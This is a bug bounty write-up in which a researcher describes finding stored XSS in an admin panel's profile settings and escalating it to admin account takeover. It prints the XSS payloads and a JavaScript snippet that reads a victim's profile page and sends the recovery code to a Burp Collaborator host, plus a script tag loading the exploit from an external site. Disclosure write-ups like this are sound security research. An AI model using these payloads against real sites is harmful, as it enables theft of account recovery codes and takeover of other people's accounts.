How i made 500$ with XSS

Hi Hackers, Hope you all are safe. today we have another writeup and it’s about my interesting finding on a private program where I was able to completely takeover admins accounts just by click to show my profile picture.

So let’s start, i was get invitation from private web application program lets called redacted.net, so the web application look like admin panel experimental in order to manage users, groups and create articles, so login page look like that with two features, first new admins can access to there admin panel using access code. secondly, exist admins can access to admin panel using their email and password, for me i was got my credentials from the programs to login.

After login, directly i move to account settings, so settings page have many inputs that was interesting so i tested all of them (except email input) with simple HTML code <h1>test</h1>, i save it and refresh page .

i notice H1 tag disappeared from all input and i don’t know where reflect, also i open other account to see if reflected but nothing found .

So after many a hours of searching without result i decide to move on other feature, so i go to test in profile picture vulnerable to XSS , i change my profile picture with PNG image contain XSS payload, i save it and click to view, the XSS image don’t reflected but i see the other inputs is reflected in this page .

I was so happy and i change HTML code to this XSS payload :

><img src=”https://media.geeksforgeeks.org/wp-content/uploads/20190516152959/Cross-Site-ScriptingXSS.png" onload=alert(11)>

and the XSS payload reflect successfully

The story not finish because after some hours of reporting, the program send message to us describe that XSS vulnerabilities is out of scope

:(

After this message i confused but i decided to escalate XSS to high impact, first thing i test if i can access to cookie unfortunately i can’t, because httpOnly is enable so i can’t access to it using JS code

i got null result using document.cookie event

for now i open my BurpSuite and analyze requests and responses, after while time i found something interesting in response

The interesting thing i found is RecoveryCode reflected in the response and other important information, so the scenario which coming to my mind is if i can access this page using JS code i can use this code in order to take over accounts, after a while i wrote this payload

var Http = new XMLHttpRequest();
var url=’https://redacted.com/profile';
Http.open(“GET”, url);
Http.send();

var burp =’https://burp-collaborator/test.php?id=' + Http.responseText ;
Http.onreadystatechange = (e) => {
Http.open(“GET”, burp);
Http.send();
}

the role of this JS code is send GET request to the interesting page, also send GET request to my burp collaborator plus the response of the interesting page, so i upload my JS code in my website and i use this payload in vulnerable input to run my JS code .

“><script src=”https://mywebsite.com/exploit.js” ><script>

burp collab after run JS code

As you can see i have successfully to access the Recovery Code plus other information, and i can use it to register as new admin and change his password because the code not expire .

Note : the recovery code is the same code when admin add new admin, and he get this code in his email to register

Bug Timeline :

Reported : 21 sep 2021
Triaged : 29 sep 2021
Reward : 29 sep 2021

Thank you for reading, see you in next blog .

My twitter : https://www.twitter.com/nvccim

Security Researcher